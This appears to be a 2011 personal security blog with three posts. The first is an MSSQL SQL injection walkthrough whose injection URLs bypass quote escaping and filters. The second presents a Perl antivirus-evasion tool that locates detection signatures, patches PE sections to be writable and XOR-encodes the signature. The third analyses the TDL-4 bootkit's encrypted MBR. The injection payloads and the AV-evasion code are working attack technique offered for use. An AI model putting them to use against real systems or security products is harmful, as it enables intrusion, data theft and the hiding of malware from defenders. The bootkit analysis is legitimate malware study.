DISCLAIMER: For Educational Purposes Only.
Level: Entry Level.
Introduction:
I do not want to reinvent the wheel, but I could not find clear enough information on bypassing single-quote filters with the MSSQL CHAR() function, so I decided to document my own steps here.
Scenario:
You have found a SQL injection in a web site, but you need to bypass some security controls to exploit it. Below are the steps taken.
Scope:
Applicable to Microsoft SQL Server 200x, although the methodology can be adapted to other databases.
Step 1: We found a SQL Error in the Web App by adding letters to a numeric field:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019danux
And therefore we got something like:
[SQLServer JDBC Driver][SQLServer]Incorrect syntax near 'danux'.
A SQL error in the response means your input reached the DB engine's parser as part of the query, which strongly suggests that the input field is injectable.
Then we confirm this by adding a SQL command like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 having 1%3d1
And we get an error confirming that our input is being interpreted as SQL:
[SQLServer JDBC Driver][SQLServer]Column 'db.dbo.table.field' is invalid in the HAVING clause because it is not contained in either an aggregate function or the GROUP BY clause.
NOTE: Every app is different, so you will need to work out your own injection string. In my case I did not need to add comments "--" at the end or single quotes (so far).
Step 2: Trying to get DB Engine and Version via (select @@version)
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select @@version)
And we noticed that no response is returned!
Escalation 1: It looks like a server-side filter is preventing us from getting the information back. A good trick is to leak the information via a SQL error message, commonly by forcing the conversion of a string into an integer. CHAR() expects an integer argument, so passing it a string forces that conversion:
e.g. select char(@@version)
Whole URL:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select char(@@version))
The DB will try to convert the string into an integer, which is not possible, and therefore an error will be generated along with our information:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (X64) Dec 10 2010 10:38:40 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1) ' to data type int
From now on in this pentest, we know we will need this kind of conversion to get the information we want.
Step 3: Let's try to get database names by injecting:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases)
And we get the default one "master" in the SQL error:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'master' to data type int.
Step 4: Now we can start searching for more databases so we do something like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where NAME not like 'master')
BUT we noticed our single quotes are being escaped:
019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like ''master%'')
Escalation 2: We use the MSSQL CHAR() function to avoid single quotes, so we inject something like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2bchar(37))
char(109) = m
%2b = +
char(37) = %
result = name not like CHAR(109)+CHAR(37)
Or in human readable syntax: name not like 'm%'
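The ASCII codes are easy to get wrong by hand, so a small helper can generate and check them. The following is a minimal Python sketch; the function names to_mssql_char and from_char_codes are made up for this illustration and do not belong to any tool mentioned here.

```python
from urllib.parse import quote

def to_mssql_char(text):
    """Rewrite a string as a quote-free CHAR() concatenation."""
    return "+".join(f"CHAR({ord(ch)})" for ch in text)

def from_char_codes(codes):
    """Turn a list of ASCII codes back into text, to double-check a payload."""
    return "".join(chr(code) for code in codes)

expr = to_mssql_char("m%")
print(expr)                       # CHAR(109)+CHAR(37)
# The plus sign must be URL-encoded, otherwise it is decoded as a space.
print(quote(expr, safe="()"))     # CHAR(109)%2BCHAR(37)
print(from_char_codes([109, 37])) # m%
```

Decoding the codes back with from_char_codes is a quick sanity check before sending the request.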
But when we inject it, we get no response again, which means a server-side filter is detecting these attempts. This is where you need to start thinking about how to bypass filters. After some minutes I decided to break the pattern by inserting a horizontal tab (ASCII 9 decimal, URL-encoded as %09) after the plus sign: char(109)%2b%09char(37):
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2b%09char(37))
And guess what:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'tempdb' to data type int.
We got the second default DB, which means Game Over! We can dump the whole database and, if we are lucky, escalate and get a remote shell (out of scope of this article).
We could get more database names by excluding the ones we already have, something like:
where name not like 'master' and name not like 'tempdb' and name not like ..... with each string encoded via CHAR() as in the instructions above.
The next immediate step would be to list the tables in the DB and then the columns of those tables, for example:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
Well known references:
1. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Hope this helps.
In this blog, we will learn Security together by sharing knowledge. Viva Mexico!
Thursday, August 18, 2011
Monday, July 4, 2011
AV Bypassing Basics- 101 Approach Series
DISCLAIMER: For Educational Purpose only. The author is not responsible for any misuse of the information.
INTRODUCTION:
Many posts have already explained the basics of bypassing a signature-based AV, so I will not repeat them. Instead, I present a tool that can be used as a framework to keep bypassing AVs by updating the encoding function with little effort.
SCOPE:
The tool was tested against AVG 7.5 and only works with 32-bit Windows PE binaries.
RESOURCES:
- Code Breakers Magazine: Portable Executable File Format - A Reverse Engineer View.
- This tool is inspired by the presentation given by Mati Aharoni at Shmoocon: http://www.youtube.com/watch?v=kwq5VQj3Ils
- Taking back netcat: http://dl.packetstormsecurity.net/papers/virus/Taking_Back_Netcat.pdf
TOOL NAME: Regalado-AV.pl
TOOL DESCRIPTION:
The tool reads a malicious file, interacts with the AV to locate the malicious signature within the binary, encodes the signature, and finally inserts a decoder function that decodes the signature in memory.
MAIN FEATURES OF THE TOOL:
- PE Parsing: The tool loads the PE binary into memory and extracts important data such as the PE Header, Data Directory, Section Table and PE file sections.
- Signature location: The tool is able to locate the "malicious bytes" (signature) being caught by the AV. Each AV has its own signatures to detect malicious files; once we find their exact location within the binary, the next step is to encode them so that the AV does not see them anymore.
- Insert Code Cave: The tool redirects the entry point to the encoder/decoder function, which decodes the encoded signature at run time.
- Section patching on the fly: The section where the signature is located must be set as "writeable" so that it can be overwritten in memory.
- Opcode creation on the fly: The tool is able to create CALL and JMP instructions, calculating the relative address on the fly and adjusting from RAW to VIRTUAL address as well.
Below is the code that extracts the properties of the PE binary:
sub get_PE_structure(){
my @cop = @_;
# bytes 60 - 63 hold the PE Header offset address (little endian)
$PE{"pe_off_addr"} = hex($cop[63] . $cop[62] . $cop[61] . $cop[60]);
print " PE Offset Address=>" . $PE{"pe_off_addr"} . "\n"; # In decimal
my $pe_off = $PE{"pe_off_addr"};
$PE{"pe_header_off"} = $cop[$pe_off] . $cop[$pe_off + 1];
#Validating we got the PE Header which starts with 50 45 = PE
if ($PE{"pe_header_off"} eq "5045"){
print " PE Header Prefix =>" . $PE{"pe_header_off"} . "\n";
}
else{
print " PE Header Offset NOT FOUND\n";
}
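#[80h + 6h] = #NumberOfSections -> 6 bytes after offset of PE Header defined above (2 bytes, little endian).
#Converted with hex() so that counts of 0Ah or more are still read as numbers by the loop below.
$PE{"NumberOfSections"} = hex($cop[$pe_off + 7] . $cop[$pe_off + 6]);
print " PE Number of Sections=>" . $PE{"NumberOfSections"} . "\n";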
#[80h + 28h] = #Virtual AddressOfEntryPoint -> 28h = 40d
$PE{"AddressOfEntryPoint"} = $cop[$pe_off + 43] . $cop[$pe_off + 42] . $cop[$pe_off + 41] . $cop[$pe_off + 40];
print " PE AddressOfEntryPoint=>" . $PE{"AddressOfEntryPoint"} . "\n";
#[80h + 2Ch] = #Virtual BaseOfCode -> 2Ch = 44d
#BaseOfCode = RVA of first byte of code when loaded into RAM
$PE{"BaseOfCode"} = $cop[$pe_off + 47] . $cop[$pe_off + 46] . $cop[$pe_off + 45] . $cop[$pe_off + 44];
print " PE BaseOfCode=>" . $PE{"BaseOfCode"} . "\n";
#[80h + 34h] = #ImageBase -> 34h = 52d
$PE{"ImageBase"} = $cop[$pe_off + 55] . $cop[$pe_off + 54] . $cop[$pe_off + 53] . $cop[$pe_off + 52];
print " PE ImageBase=>" . $PE{"ImageBase"} . "\n";
#Calculating the distance from the start of Code section to the Entry Point, this will be used to calculate the Raw Offset of Entry Point
my $diff = hex($PE{"AddressOfEntryPoint"}) - hex($PE{"BaseOfCode"});
#print " Entry point is $diff (dec) bytes away from the start of code section\n";
#Sections related data, not part of PE Structure but each section
#[80h + F8h] = #START OF SECTION TABLE - PE Offset + F8h (248d) = 178h start of .text section
$sec_off = $pe_off + 248;
for (my $i =1; $i <= $PE{"NumberOfSections"}; $i++){
#[80h + F8h] = #START OF SECTION TABLE - PE Offset + F8h (248d) = 178h start of .text section
#[178] = #Offset of .text section
#[178] = #Section name - 8 bytes
$sec_name = sprintf("%c%c%c%c%c%c%c%c", hex($cop[$sec_off]) , hex($cop[$sec_off + 1]) , hex($cop[$sec_off + 2]) , hex($cop[$sec_off + 3]) ,
hex($cop[$sec_off + 4]) , hex($cop[$sec_off + 5]) , hex($cop[$sec_off + 6]) , hex($cop[$sec_off + 7]));
$sec_name =~ s/^(\.[a-zA-Z]+).+/$1/;
print " Section Name=>" . $sec_name . "<<\n";
$SEC{$i}{"name"} = $sec_name;
$SEC{$i}{"offset"} = $sec_off;
#print " Section Offset=>" . $SEC{$i}{"offset"} . "\n";
#[178h + 0c] = #Virtual Address - Size of data on disk - 4 bytes - + 0c h = 12d
$SEC{$i}{"VirtualAddress"} = $cop[$sec_off + 15] . $cop[$sec_off + 14] . $cop[$sec_off + 13] . $cop[$sec_off + 12];
print " VirtualAddress=>" . $SEC{$i}{"VirtualAddress"} . "\n";
#[178h + 10h] = #SizeOfRawData - Size of data on disk - 4 bytes
$SEC{$i}{"SizeOfRawData"} = $cop[$sec_off + 19] . $cop[$sec_off + 18] . $cop[$sec_off + 17] . $cop[$sec_off + 16];
print " SizeOfRawData=>" . $SEC{$i}{"SizeOfRawData"} . "\n";
#[178h + 14h] = #PointerToRawData - Raw Offset of section on disk - could be zero, if not, take it without extra calc, otherwise extra calc.
$SEC{$i}{"PointerToRawData"} = $cop[$sec_off + 23] . $cop[$sec_off + 22] . $cop[$sec_off + 21] . $cop[$sec_off + 20];
print " PointerToRawData=>" . $SEC{$i}{"PointerToRawData"} . "\n";
if ($i == 1){
#Saving ONLY offset of first section which will be the offset to start obfuscating the file
$firstOffset = hex($SEC{$i}{"PointerToRawData"});
#Calculating the Raw offset of Entry Point based on Virtual AddressOfEntryPoint
$rawEntryPoint = $firstOffset + $diff;
print " Raw Entry Point: $rawEntryPoint\n";
}
#[178h + 24h] = #Characteristics - DWORD = 4 bytes - Defines the permissions of the section when loaded in memory
#Flags => 20000000 - section is executable
# 40000000 - section is readable
# 80000000 - section is writable - If the flag value is less than 80000000 the section is not writable and this amount must be added to it.
# e.g. .rdata flag = 40000040 is not writable. Making it writable requires adding 80000000 to the current value, so the final flag would be C0000040
# 40000040 + 80000000 = C0000040
$SEC{$i}{"flag"} = $cop[$sec_off + 39] . $cop[$sec_off + 38] . $cop[$sec_off + 37] . $cop[$sec_off + 36];
print " Flag=>" . $SEC{$i}{"flag"} . "\n";
#Pass current flag of section and the array containing the raw file, this when calling the function
#Now, lets move on to the next section offset which is 28h = 40d bytes further
$sec_off += 40;
}#End of For loop
}
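For comparison, the same fields can be read straight from the raw bytes with little-endian unpacking instead of concatenating hex strings by hand. This is only a minimal Python sketch, not part of Regalado-AV.pl: the function name parse_pe_header and the returned dictionary layout are invented for the example, and it assumes a 32-bit PE whose optional header is the usual 224 bytes (which is what the fixed F8h offset above relies on).

```python
import struct

def parse_pe_header(data):
    """Extract a few PE32 header fields and the section table from raw bytes."""
    # Bytes 60-63 (0x3C) hold the offset of the PE header, little endian.
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # NumberOfSections is a 2-byte field, 6 bytes after the PE signature.
    (num_sections,) = struct.unpack_from("<H", data, pe_off + 6)
    # AddressOfEntryPoint (+28h) and BaseOfCode (+2Ch) are adjacent DWORDs.
    entry_point, base_of_code = struct.unpack_from("<II", data, pe_off + 0x28)
    (image_base,) = struct.unpack_from("<I", data, pe_off + 0x34)

    sections = []
    sec_off = pe_off + 0xF8  # assumption: 224-byte PE32 optional header
    for _ in range(num_sections):
        name = data[sec_off:sec_off + 8].rstrip(b"\x00").decode("ascii", "replace")
        # VirtualAddress (+0Ch), SizeOfRawData (+10h), PointerToRawData (+14h)
        vaddr, raw_size, raw_ptr = struct.unpack_from("<III", data, sec_off + 12)
        (flags,) = struct.unpack_from("<I", data, sec_off + 36)
        sections.append({
            "name": name,
            "offset": sec_off,
            "VirtualAddress": vaddr,
            "SizeOfRawData": raw_size,
            "PointerToRawData": raw_ptr,
            "flag": flags,
        })
        sec_off += 40  # each section header is 28h bytes long
    return {
        "pe_off_addr": pe_off,
        "NumberOfSections": num_sections,
        "AddressOfEntryPoint": entry_point,
        "BaseOfCode": base_of_code,
        "ImageBase": image_base,
        "sections": sections,
    }
```

It would be called with the whole file contents, for example parse_pe_header(open(path, "rb").read()), where path is whatever binary is being inspected.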
Locating the malicious signature within the binary:
The idea was taken from the document "Taking Back Netcat", with small changes. Basically, the steps performed by the tool are:
1. The binary is split into two parts: part1 and part2.
2. Part1 is filled with zeros.
3. The AV scan is run against the binary.
4. If a virus is detected by the scan, the signature is located in part2 (since part1 contains only zeros). Then part2 is divided into a new part1 and part2, and we go back to point 2.
5. If a virus is NOT detected by the scan, the signature is located in part1. Then part1 is divided into a new part1 and part2, and we go back to point 2.
6. Points 2 to 5 are repeated until there are no more bytes left to analyze or until the AV no longer detects the virus in either part1 or part2.
sub get_signature(){
my ($parte, $off, $end, @cop) = @_;
my $chunk = "";
my $div = "";
my $mod = "";
if ($parte eq "p1") { #Split into 2 parts and use the first one - p1
$chunk = $end - $off;
$div = $off + ($chunk / 2);
$mod = $chunk % 2;
if ($mod == 1) {
$div = ceil($div);
#print "Rounded: $div\n";
}
}
elsif ($parte eq "p2"){#Do not split, just obfuscate part 2
$div = $end;
}
print "\n" . $off . " < -- > ". $div . "\n";
#There will always be only 2 parts of the file: Part 1 and Part 2
#for my $n ($offset .. $div){#Fill Part 1 with zeros
my $cont = 0;
for my $n ($off .. $div){#Fill Part 1 with zeros
$cop[$n] = sprintf("%02x", "00");
$cont += 1;
}
print "Bytes obfuscated: " . $cont . "\n";
write_file(@cop); #Write file to be scanned by AV
ask_user(); #Ask the end user whether a virus was found
if ($ans eq "y") { #Virus found, so the signature is located in Part 2
$c_found +=1;
if ($c_found == 2){
#check if a previous good obfuscation of signature was detected
if ($sig_ini > 0){
print "\n\t***** Signature FOUND *******\n";
#print "\t" . $sig_ini . " < -- > ". $sig_end . "\n";
get_section();
get_signatureVA();#Calculate virtual offset of signature to use it within decoder routine
print "\tSignature Address range: " . $vsig_ini . " < -- > ". $vsig_end . "\n\n";
}
else{
print "\n\t***** Oooops :-( ... Signature NOT FOUND *******\n";
exit(0);
}
}
else{
get_signature("p2", $div + 1, $end, @copia);
}
}
elsif ($ans eq "n") {#Signature located in Part 1
$c_found =0;
$sig_ini = $off;
$sig_end = $div;
#Before searching again for the signature, we make sure the signature is not less than 1 byte; if so, no more iterations
if ( ($div - $off <= 1) ){
print "\n\t***** Signature FOUND ***********\n" ;
get_section();
get_signatureVA();#Calculate virtual offset of signature to use it within decoder routine
print "\tSignature Address Range: " . $vsig_ini . " < -- > ". $vsig_end . "\n\n";
}
else{
get_signature("p1", $off, $div, @copia);
}
}
}
You can see how this works by watching the video mentioned at the end of this article.
Inserting Code Cave:
1. The tool searches for enough space (35 bytes) within the text section to insert our decoder. TODO: The tool should be able to search in every section or even create a new one if not enough space is found.
2. The tool redirects the Entry Point by inserting a CALL instruction that jumps into the space found at point 1. The tool assumes the entry point contains a 5-byte instruction, which can therefore be replaced with a CALL instruction that is also 5 bytes. This assumption can be changed with the "-o" option.
3. The signature found is encoded with a XOR key.
4. A basic XOR decoder is inserted with a random key, which is generated every time the program runs.
5. The new file is stored in the filesystem.
One of the main features that I personally loved implementing was the ability to make the section writeable if needed.
Every section (text, data, resources, and so on) within a PE file contains a DWORD member called "Characteristics", whose flags indicate, among other things, whether the section is executable and which permissions it has in memory. In our case, we need to make sure the section is "writeable" in memory so that the signature (which was encoded at rest) can be decoded in place at run time.
The calculation took me time to understand, but the formula is simple. The tool gets the DWORD of the Characteristics member of the section where the signature was found; if the value is less than 0x80000000, the section is NOT writeable in memory, and therefore the hex value 0x80000000 is added to the current flag.
The code is shown below:
sub set_flag(){
my $i = shift @_;
#@copia = @main;
#If the flag value is < 80000000 the section is not writable, so 80000000 is added to it. If it is >= 80000000 the section is already writable and nothing is done.
if ( hex($SEC{$i}{"flag"}) < hex("80000000") ) {
print ("\tThe section is not writable! so patching the section.\n");
my $w_byte = sprintf("%x", hex($SEC{$i}{"flag"}) + hex("80000000") ) ;
#print " New writable Flag=>" . $w_byte . "\n";
#Patching the binary in little endian.
$copia[$SEC{$i}{"offset"} + 36] = substr $w_byte, 6,2;
$copia[$SEC{$i}{"offset"} + 37] = substr $w_byte, 4,2;
$copia[$SEC{$i}{"offset"} + 38] = substr $w_byte, 2,2;
$copia[$SEC{$i}{"offset"} + 39] = substr $w_byte, 0,2;
#Write the new patched binary
#write_file(@copia);
}
else{
print ("\tThe section is writable so we are good to go!\n");
}
}
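Because the writable flag is the highest bit of the DWORD, "less than 0x80000000" is the same as "bit not set", and adding 0x80000000 is the same as setting that bit. The following Python sketch shows the equivalent bitmask form; the helper names is_writable and make_writable are invented for this example, while the three constants are the standard PE section flag values listed in the comments above.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section is executable
IMAGE_SCN_MEM_READ = 0x40000000     # section is readable
IMAGE_SCN_MEM_WRITE = 0x80000000    # section is writable

def is_writable(flags):
    """True when the writable bit is set in a Characteristics DWORD."""
    return bool(flags & IMAGE_SCN_MEM_WRITE)

def make_writable(flags):
    """Return the flags with the writable bit set (no change if already set)."""
    return flags | IMAGE_SCN_MEM_WRITE

flags = 0x40000040                       # the .rdata example from the comments
patched = make_writable(flags)
print(is_writable(flags))                # False
print(hex(patched))                      # 0xc0000040
# The DWORD is stored on disk in little endian, lowest byte first.
print(struct.pack("<I", patched).hex())  # 400000c0
```

Using the OR form has the small advantage of being safe to apply twice, whereas adding 0x80000000 to an already writable flag would overflow the DWORD.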
TODO:
- Able to insert new encoders to bypass latest AVs.
- Able to create new sections if needed.
- Able to encode the Metasploit encoders.
IMPORTANT:
See how the tool works here:
If interested in the source code, send me an email to danuxx@gmail.com.
Please share new ideas to implement new encoders in the tool.
Tuesday, March 15, 2011
TDSS:TDL-4 - Bootkit - 101 Approach - Part 1
DISCLAIMER: First off, all the information found here is for EDUCATIONAL PURPOSE ONLY. The author is not responsible for any misuse.
IMPORTANT: The intent of my posts is to share knowledge and grow together, so if you find something that you think is inaccurate, feel free to let me know and together we can prepare a better document and learn together. I am not a Hacker, Cracker or something similar, just a hot-blooded Security guy who wants to learn and share. So, if you want to start criticizing without proposing anything, I will just ignore those comments.
Audience: Not for Junior/Senior Malware Analyst but for starters.
Acknowledgments: I want to thank Phil Fuhrer who realized we were dealing with TDL-4 and who found the ROR procedure to encode part of MBR code.
In this Part 1, I will analyze only the bootkit portion of the Malware.
Master Boot Record Infection (MBR):
As mentioned by Kaspersky, this new variant infects the MBR, and here is the first "gray area" that needs more explanation. In order to understand how the MBR is infected, you must first understand how the MBR works. "An Examination of the Standard MBR" is an old but excellent article that explains how the MBR works, along with the associated assembly code.
When a BIOS-based (Basic Input Output System) computer boots, the first code it executes is the BIOS, which is stored in the computer's ROM. The BIOS selects a boot device, reads the device's MBR into memory (see point 3 below), and transfers control to the code in the MBR.
For the purpose of this analysis, these are the key points to keep in mind about MBR:
Analyzing MBR code:
Get the first 512 bytes of the infected hard drive and open them with IDA Pro by choosing:
Various Files -> Binary/Raw File option
And very important, when IDA Pro asks "Do you want to disassemble it as 32 bit code?"
Click "NO", since MBR code is 16-bit (bp instead of ebp, sp instead of esp, and so on).
Another point to consider: once the code is loaded into IDA, go to the first assembly instruction and hit the letter "C" (to mark those bytes as code) so that IDA can analyze the code and create the proper assembly operands; otherwise you will see code that makes no sense. This needs to be done every time you need IDA to interpret a piece of code being analyzed.
The image below shows an extract of the first instructions of the MBR in IDA Pro. By reviewing these lines of code, we realized the bootkit did not change the MBR's initial behavior.
What this code does is copy the MBR code itself from memory location 7C00h to 600h. This is done because, later on, the MBR code will load the Boot Sector of the Active Partition into the same area of memory (7C00h) that the MBR was first loaded into.
Basically, the code uses the movsb instruction to move a single byte at a time from SI = 7C00h to DI = 600h. In order to move 512 bytes, the CX register is used as the counter (200h = 512d), with the REP (repeat) prefix looping to copy the whole sector into the new location.
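The relocation can be mimicked in a few lines to make the role of each register concrete. This is just a Python sketch of the copy described above, assuming a flat 64 KB memory array and the direction flag cleared (so SI and DI count upwards); the function name rep_movsb and the dummy sector contents are made up for the illustration.

```python
def rep_movsb(mem, si, di, cx):
    """Copy cx bytes, one at a time, from mem[si] to mem[di] (REP MOVSB, DF=0)."""
    while cx > 0:
        mem[di] = mem[si]   # movsb: move one byte
        si += 1             # SI and DI advance after every byte
        di += 1
        cx -= 1             # REP decrements CX and stops at zero
    return si, di

mem = bytearray(0x10000)          # one 64 KB real-mode segment
mbr = bytes(range(256)) * 2       # stand-in for a 512-byte MBR sector
mem[0x7C00:0x7E00] = mbr          # where the BIOS loads the sector

si, di = rep_movsb(mem, si=0x7C00, di=0x600, cx=0x200)
print(hex(si), hex(di))           # 0x7e00 0x800
print(mem[0x600:0x800] == mbr)    # True
```

After the copy, the 512 bytes live at 600h through 7FFh, which is why the later offsets in this analysis are expressed relative to 600h.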
Decrypting MBR code:
By looking at the next instructions within the MBR sector, we confirmed the bootkit was using a basic ROR (Rotate right) method to obfuscate/encrypt some code as explained by Kaspersky blog, so let's analyze how this obfuscation works and the address space affected. Below is the chunk of code that implements the encryption process:
Before starting our analysis, make a note of the instructions starting at offset 2A. Those are currently encrypted, so at this point they make no sense, right? You will see the difference below once they are decrypted.
001E: CX is set to 132h. This number provides both the size of the memory chunk to be decrypted and the key used for decryption. I will explain this in detail below.
0021: BP is set to 62Ah, the offset in memory where the ROR will start decrypting the data. Remember that the MBR copied itself to 600h, so the encrypted code is located 2Ah bytes further on, right after the loop instruction.
0024: The ROR instruction is executed against the byte located at 62Ah with the key held in the CL register, which is 32h in the first iteration. The next iteration decrypts the byte at 62Ah + 1 with CL=31h, and so on.
0028: Loop until CX becomes 0, at which point the loop ends (the loop instruction decrements CX by default).
*NOTE: In order to avoid "pattern recognition", malware creators change the registers and/or keys of the malicious code. If you compare the decryption routine described by the Kaspersky guys with mine, you will notice one change: the decryption key/size is different:
Kaspersky = CX = 137h
Mine = CX = 132h
With this small change, all the encrypted code looks totally different.
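To make the loop concrete, here is a minimal Python sketch of the same idea. It assumes the routine is simply "rotate the byte at BP right by CL, advance BP, loop on CX", as described in the walkthrough above; the function names ror8 and decrypt_chunk are invented for the example. An 8-bit rotation repeats every 8 positions, so only the rotation count modulo 8 matters.

```python
def ror8(value, count):
    """Rotate an 8-bit value right by count bits."""
    count %= 8
    return ((value >> count) | (value << (8 - count))) & 0xFF

def decrypt_chunk(data, offset, cx):
    """Apply ROR to cx consecutive bytes, using the low byte of CX as the key."""
    out = bytearray(data)
    pos = offset
    while cx > 0:
        cl = cx & 0xFF            # CL is the low 8 bits of CX
        out[pos] = ror8(out[pos], cl)
        pos += 1                  # next byte of the encrypted chunk
        cx -= 1                   # what the loop instruction does
    return bytes(out)

print(hex(ror8(0x01, 1)))                      # 0x80
print(decrypt_chunk(b"\x01\x02", 0, 2).hex())  # 4001
```

With the values from this sample the call would be decrypt_chunk(sector, 0x2A, 0x132), where sector holds the 512 bytes of the dumped MBR; the chunk ends at offset 2Ah + 132h = 15Ch, well inside the sector.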
You could decrypt the whole chunk by applying the ROR to every single byte by hand, but that is tedious and prone to errors, so I took the opportunity to create a simple Perl script (Regalado-ROR.pl) to do the ROR decryption for us.
Basically, the script expects these parameters (all required): -f, the raw file to decrypt; -k, the key/size value loaded into CX, in hex; and -o, the offset in hex where the encrypted chunk starts.
Regalado-ROR.pl will create an output file called "testiculo.bin" (don't ask me what this means in Spanish LoL) with the chunk of code decrypted; you can then open this file in IDA Pro to keep analyzing further instructions.
So, the way I executed the script was:
./Regalado-ROR.pl -f MBR-dump.raw -k 132 -o 2A
Outputfile = testiculo.bin
The image below shows the new raw file created by Regalado-ROR.pl with the decrypted instructions starting at offset 2A, which NOW make more sense. You can start seeing "int 13h" (explained later) and the ldr16 string mentioned by Kaspersky, which means we are heading in the right direction!!
The Regalado-ROR.pl script is shown below, for you to use it in new variants of TDL-4.
#!/usr/bin/perl
# Regalado-ROR.pl implementation to decrypt the MBR
# Author: Daniel Regalado aka Danux Mitnick from Neza to the World!!!!
# Email: danuxx at gmail.com
# Date: 03/11/2011 - 3:36 AM
use Getopt::Std;

getopts('f:k:o:', \%args);
if (!defined($args{'k'}) or !defined($args{'f'}) or !defined($args{'o'})) {
    print "\n\tUsage: Regalado-ROR.pl -f <raw file> -k <key in hex> -o <offset in hex>\n";
    exit(0);
}

my @main;                    # Array which contains the raw encrypted chunk
my $file = $args{'f'};
load_file();                 # Let's load the raw file into @main array.
my @dec = @main;             # Array which contains the raw decoded chunk
my $key = hex($args{'k'});   # Value loaded into CX: chunk size and key
my $off = hex($args{'o'});   # Offset where the encrypted chunk starts

for (1 .. $key) {
    # Keep only the low 8 bits of the key (the CL register)
    my $cl = $key & 0b11111111;
    #print "CL => $cl \n";
    $key--;
    #print "Raw byte=> $main[$off] \n";
    $dec[$off] = &ror(hex($main[$off]), $cl);
    $off++;
}
write_file(@dec);            # Write decoded chunk to be analyzed by IDA Pro

sub ror {
    # Usage: &ror(number, n)
    # Rotate the 8-bit 'number' by 'n' bits right
    my $number      = shift;
    my $bits2rotate = shift;
    for (1 .. $bits2rotate) {
        # Get right-most bit
        my $rmb = $number & 0b00000001;
        # Shift right 1 bit
        $number = $number >> 1;
        # Set left-most bit if the right-most bit of the number was == 1
        if ($rmb == 1) {
            $number = $number | 0b10000000;
        }
    }
    return sprintf("%02x", $number);
}

# Writes the array containing the raw file to the file system.
# Param 1: Array containing the raw file
sub write_file {
    my @final = @_;
    open(FILE2, ">testiculo.bin") or die $!;
    binmode(FILE2);
    for my $n (0 .. $#final) {
        print FILE2 sprintf("%c", hex($final[$n]));
    }
    close(FILE2);
}

# Loads the file given with -f into @main, one two-digit hex string per byte.
sub load_file {
    open(FILE, "<$file") or die $!;
    binmode(FILE);
    @main = ();
    my $char = "";
    my $i = 0;
    while (1) {
        $char = getc(FILE);
        $main[$i] = sprintf("%02x", ord($char));
        if (eof(FILE)) {
            $fin = $i;       # Saving the index of the last byte of the file.
            last;
        }
        $i += 1;
    }
    close(FILE);
}
#END of Script
Understanding decrypted code:
The next step is to understand what the decrypted code is going to do. As per the Kaspersky blog: "The main function of the MBR loader, which is small in size, is to search the rootkit’s encrypted partition for the ldr16 component, load it into RAM and pass control to it."
But again, let's analyze this "gray area" since there are many internal steps before taking above conclusion.
The main feature to understand here is interrupt 13h, or INT 13, which provides different functions to read, write, lock, unlock, eject, etc., hard disks and removable media. There are two types of int 13h: 1. The legacy INT 13
Which means, the data is being loaded at offset 88Dh in the memory space.
Something to keep in mind is that the LBA address found in memory was 09502F59 and the last sector is 09502F90. This could be the range copied (backwards) from disk to memory; we will confirm this later.
Quick tip - Getting sectors with the dd tool:
dd if=/dev/sdb bs=512 skip=156249945 count=2 > out
Where 156249945d = 09502F59h, the block detected in memory.
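The hexadecimal LBA has to be converted to decimal before it can be passed to dd's skip parameter, and that conversion is easy to get off by one. A quick way to check it, using only the two LBA values quoted above (the variable names are just for illustration):

```python
first_lba = int("09502F59", 16)   # LBA found in memory
last_lba = int("09502F90", 16)    # last sector mentioned above

print(first_lba)                  # 156249945
print(last_lba)                   # 156250000
print(last_lba - first_lba + 1)   # 56 sectors if both ends are included

# Build the dd command line for the first two sectors of that range.
print(f"dd if=/dev/sdb bs=512 skip={first_lba} count=2 > out")
```

Since dd's skip counts whole blocks of bs bytes from the start of the device, skip=N with bs=512 starts reading exactly at LBA N.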
Decrypt the sector loaded (via XOR function)
Once the encrypted sectors have been loaded into memory, the fun part begins: the code related to the decryption process, as shown below:
00C4: The code will zero out all the bytes from offset 75D through 85C. Why does the range stop after FFh? Because the loop is driven by the BL register, which is 8 bits long: after FFh the next value would be 100h (BH=01, BL=00), so BL wraps to 0 and the loop ends, covering 256 bytes in total. From 00CC to 00ED the same range (75D - 85C) is set with different values based on multiple calculations.
Decryption loop:
In the first two instructions of the code below we can see that, since the last byte affected by the previous code (see above) was at offset 85C, the next bytes to be changed are at offsets 85D and then 85E. This shows how the bootkit prepares the bytes to be used during the decryption process.
The decryption loop starts at offset 0109. Some calculations are performed to derive the encryption key, which is stored in register CL, and finally at instruction 012B the XOR is executed against the byte SI points to, which is (see above) offset 88D, where the first byte from disk was loaded. A sector of 512 bytes is decrypted, as expected; we can confirm this by checking the value of register DX, which is the counter of this loop and is set to 200h (512 bytes) at instruction 00FA.
Jumping to the decrypted code in Memory
Once all the sectors loaded from disk have been decrypted in memory, it is time to jump to the new instructions. In the code below we can see two important things:
1. 060 - 067: Decrypted code is being moved from SI (893h) to DI (calculated at runtime) CX number of times. Here is where decrypted code is being loaded into memory, this step happens every time one sector has been decrypted.
2. 069 - 071: The value at offset 891h in memory will call the decryption function if more sectors need to be decrypted, otherwise will jump to the decrypted code in memory.
Next Steps
